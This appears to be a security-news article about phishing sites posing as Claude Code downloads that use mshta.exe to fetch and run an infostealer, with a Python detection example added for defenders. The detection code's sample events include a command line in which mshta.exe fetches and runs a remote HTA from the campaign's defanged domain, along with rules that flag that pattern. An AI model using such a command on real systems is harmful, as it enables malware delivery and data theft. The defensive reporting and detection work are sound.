CyberSecurity SEE

Threat Actors Use Fake Claude Code Downloads to Distribute Infostealer Malware

Threat Actors Exploit Interest in Anthropic’s Claude Code with Phishing Campaigns

Recent reports reveal that threat actors are capitalizing on the growing interest in Anthropic’s Claude Code tools. They are running phishing campaigns built around counterfeit download portals that distribute a lightweight infostealer through the Microsoft HTML Application host, mshta.exe.

The scenario shows how a single living-off-the-land binary (LOLBIN) can serve as the backbone of a data-theft operation, with no need for a more complex malware framework. The attackers are registering or hijacking domains that convincingly mimic legitimate download sites for Claude Code, then promoting those domains through search engine results, advertisements, and social media, specifically targeting developers and tech-savvy users eager to try Claude Code.

One domain identified in this campaign is it[.]com. The site hosts a fraudulent installer or download link that claims to offer the authentic Claude Code desktop application. When a victim clicks the “download” button, they receive either a script-based loader or a shortcut file rather than a legitimate installer. These files quietly hand control to built-in Windows binaries, which is where the attack begins.

The tactics employed in this campaign bear a striking resemblance to previous incidents where the branding of AI tools, including popular platforms like ChatGPT, has been misused to persuade users into executing unsigned code. In this case, the promise of accessing Claude Code is sufficient to trick users into running potentially harmful scripts. Many of these downloaded files are deceptively small and appear harmless, easily evading scrutiny from vigilant users.

MSHTA as the Delivery Workhorse

Central to the attack is mshta.exe, Microsoft’s HTML Application Host, which has long been abused by cybercriminals. This LOLBIN can execute HTA files and remote scripts with the same trust level as native Windows components, giving operators a way to download the infostealer without deploying a traditional executable at the initial stage.

After the victim launches the fake installer, a command spawns mshta.exe with a remote URL as its parameter, instructing it to fetch and execute an HTA payload directly from the compromised domain it[.]com. The entire sequence can complete within a single user session, with the only visible artifact being a fleeting installer window or, depending on how the lure is crafted, nothing at all.

The Significance of Simple LOLBins

This incident serves as a crucial reminder that defenders in the cybersecurity landscape cannot afford to consider alerts triggered by mshta.exe as mere background noise or low-priority alerts. Security teams have consistently found that a single suspicious instance of mshta.exe—particularly one connecting to an external domain—can be the first and only indication of a multi-stage infostealer operation.

Even if endpoint protection mechanisms manage to block the ultimate payload, the initial invocation of mshta.exe can yield valuable indicators of compromise, which are crucial for comprehensive threat hunting and operational containment.

Moreover, not every significant detection hinges on sophisticated machine-learning models or extensive sandboxing techniques. Security professionals can often uncover genuine attacker behavior by closely monitoring a handful of LOLBins, such as mshta.exe, powershell.exe, and wscript.exe.

For defenders, tuning detection systems to respond to remote HTA execution attempts, unexpected parent processes for mshta.exe, and outbound connections to newly observed domains such as it[.]com can provide powerful, low-noise signals that aid in identifying ongoing threat campaigns.
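As an added illustration of those three signals (not code from the original article or from any vendor), the following Python applies them to constructed Sysmon Event ID 1-style process-creation records; the parent-process allowlist and the baseline of known domains are assumptions for the example, and the first sample event mirrors the campaign described above using the article's defanged domain.

```python
"""Flag suspicious mshta.exe launches in process-creation telemetry (added example)."""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Assumption: a user double-clicking a local .hta launches mshta.exe from explorer.exe
EXPECTED_PARENTS = {"explorer.exe"}
# Constructed baseline of domains previously observed in this environment (not real data)
KNOWN_DOMAINS = {"update.example-corp.internal", "sso.example-corp.internal"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events; the first mimics the fake installer handing off to mshta.exe
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://it[.]com/claude-code-setup.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\dev\Downloads\report.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons this event is suspicious; empty list means benign or not mshta."""
    if _basename(ev.get("Image", "")) != "mshta.exe":
        return []
    reasons: List[str] = []
    urls = REMOTE_URL.findall(ev.get("CommandLine", ""))
    if urls:
        reasons.append("remote_hta")  # mshta fetching and executing a remote HTA
        # Restore defanged "[.]" so urlparse yields the real host for baseline comparison
        host = urlparse(urls[0].replace("[.]", ".")).hostname or ""
        if host and host not in KNOWN_DOMAINS:
            reasons.append(f"new_domain:{host}")
    parent = _basename(ev.get("ParentImage", ""))
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected_parent:{parent}")
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only events that raised at least one reason, paired with those reasons."""
    return [{"event": ev, "reasons": r} for ev in events if (r := analyze_event(ev))]
```

A local .hta opened from explorer.exe raises nothing, so the rule stays quiet on the common benign case while the remote-URL, new-domain and unexpected-parent signals stack on the campaign pattern.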

In conclusion, the tactics employed by cybercriminals continue to evolve, and vigilant monitoring and responsive security measures remain essential to thwarting deceptive campaigns, especially those that exploit interest in new technology such as Anthropic’s Claude Code. Organizations and security teams need to stay proactive in their defenses against these ever-present threats.
